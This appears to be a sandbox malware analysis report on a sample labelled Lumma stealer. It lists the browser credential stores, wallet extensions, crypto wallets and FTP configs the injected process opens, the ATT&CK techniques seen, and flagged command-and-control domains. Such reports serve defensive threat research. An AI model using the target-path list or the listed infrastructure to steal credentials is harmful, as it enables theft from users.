              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, one line per tactic. The number in parentheses is the count shown beside that technique in the original matrix; entries without a count are the matrix's unhighlighted default cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (12); PowerShell (1); At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (21); Process Injection (311); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (21); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Keylogging
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label
anti-malware-setup.exe | 72% | Virustotal | -
anti-malware-setup.exe | 71% | ReversingLabs | Win32.Spyware.Lummastealer
No Antivirus matches
Source | Detection | Scanner | Label
https://api.steamp | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/v | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/api | 100% | Avira URL Cloud | malware
https://sputnik-1985.com/~ | 100% | Avira URL Cloud | malware
https://community.fastly.steamstatic.com~T | 0% | Avira URL Cloud | safe
https://store.steampower | 0% | Avira URL Cloud | safe
https://store.st1T | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/ | 100% | Avira URL Cloud | malware
enterwahsh.biz | 100% | Avira URL Cloud | malware
https://login.sbZ | 0% | Avira URL Cloud | safe
https://checkout.steampownZ | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/apiate | 100% | Avira URL Cloud | malware
https://sketchfab.0Z | 0% | Avira URL Cloud | safe
https://help.st~Z | 0% | Avira URL Cloud | safe
https://api.steAT | 0% | Avira URL Cloud | safe
https://sputnik-1985.com:443/api | 100% | Avira URL Cloud | malware
https://cdn.fastly.steamFT | 0% | Avira URL Cloud | safe
https://sputnik-1985.com/U70 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | - | high
sputnik-1985.com | 104.21.48.1 | true | false | - | high
53.210.109.20.in-addr.arpa | unknown | unknown | true | - | unknown
wordyfindy.lat | unknown | unknown | false | - | high
slipperyloo.lat | unknown | unknown | false | - | high
curverpluch.lat | unknown | unknown | false | - | high
tentabatte.lat | unknown | unknown | false | - | high
manyrestro.lat | unknown | unknown | false | - | high
bashfulacid.lat | unknown | unknown | false | - | high
198.187.3.20.in-addr.arpa | unknown | unknown | false | - | high
shapestickyr.lat | unknown | unknown | false | - | high
enterwahsh.biz | unknown | unknown | true | - | unknown
talkynicer.lat | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
slipperyloo.lat | false | - | high
https://sputnik-1985.com/api | true | Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199724331900 | false | - | high
enterwahsh.biz | true | Avira URL Cloud: malware | unknown
curverpluch.lat | false | - | high
tentabatte.lat | false | - | high
manyrestro.lat | false | - | high
bashfulacid.lat | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/chrome_newtab | BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://player.vimeo.com | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://steamcommunity.com/?subsection=broadcasts | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://api.steamp | BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.gstatic.cn/recaptcha/ | BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.fastly. | BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sputnik-1985.com/~ | BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.valvesoftware.com/legal.htm | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.youtube.com | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://sputnik-1985.com/v | BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://store.st1T | BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl | BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://s.ytimg.com; | BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | - | high
